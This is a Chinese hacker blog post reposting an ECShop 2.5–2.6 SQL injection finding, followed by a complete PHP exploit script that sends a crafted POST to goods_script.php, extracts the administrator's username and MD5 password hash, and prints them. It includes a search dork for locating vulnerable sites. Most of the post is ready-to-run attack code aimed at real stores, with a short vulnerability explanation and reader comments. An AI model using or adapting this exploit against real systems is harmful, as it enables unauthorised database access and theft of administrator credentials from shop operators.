导航

心动吧黑客BLOG

自发研究:须要多维思想而且要想不可能为可能的人才能做到

« ASp fso组件(第十二节) 再续Pluck CMS 4.6.1 (module_pages_site.php post) LFI Exploit »

ECShop注射漏洞

 by Ryat http://bbs.wolvez.org 2009-03-24 影响2.5.x和2.6.x,其他版本未测试 goods_script.php44行:

 if (empty($_GET['type']))
{
...
}
elseif ($_GET['type'] == 'collection')
{
...
}
$sql .= " LIMIT " . (!empty($_GET['goods_num']) ? intval($_GET['goods_num']) : 10);
$res = $db->query($sql);$sql没有初始化,很明显的一个漏洞:)

EXP:

#!/usr/bin/php
<?php

print_r('
+---------------------------------------------------------------------------+
ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit
by puret_t
mail: puretot at gmail dot com
team: http://bbs.wolvez.org
dork: "Powered by ECShop"
+---------------------------------------------------------------------------+
');
/**
* works with register_globals = On
*/
if ($argc < 3) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to ecshop
Example:
php '.$argv[0].' localhost /ecshop/
+---------------------------------------------------------------------------+
');
exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];

$resp = send();
preg_match('#href="([\S]+):([a-z0-9]{32})"#', $resp, $hash);

if ($hash)
exit("Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n");
else
exit("Exploit Failed!\n");

function send()
{
global $host, $path;

$cmd = 'sql=SELECT CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user WHERE action_list=0x'.bin2hex('all').' LIMIT 1#';

$data = "POST ".$path."goods_script.php?type=".time()." HTTP/1.1\r\n";
$data .= "Accept: */*\r\n";
$data .= "Accept-Language: zh-cn\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
$data .= "Host: $host\r\n";
$data .= "Content-Length: ".strlen($cmd)."\r\n";
$data .= "Connection: Close\r\n\r\n";
$data .= $cmd;

$fp = fsockopen($host, 80);
fputs($fp, $data);

$resp = '';

while ($fp && !feof($fp))
$resp .= fread($fp, 1024);

return $resp;
}

?>

 

原创文章如转载,请注明:转载自心动吧黑客BLOG [ http://www.abcxd.com/abcxd/ ]

本文链接地址:http://www.abcxd.com/abcxd/abcxdArticle/PHPoday/176/

  • quote 1.臭虫
  • http://www.hackserver.cn
  • 楼上的有本事的话你别打补丁啊~装逼招雷劈!
    kissjetg 于 2009-7-8 1:16:44 回复
    这年头爱装B的人多。没办法。我们只能笑着看。否则身体无益呀
  • 2009-7-4 17:39:54 回复该留言

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

黑客榜之本月排行

搜索内容

日历

Copyright ⊙ 2004-2009 心动吧 UrL:ABCXD.CoM All RiGhts Reserved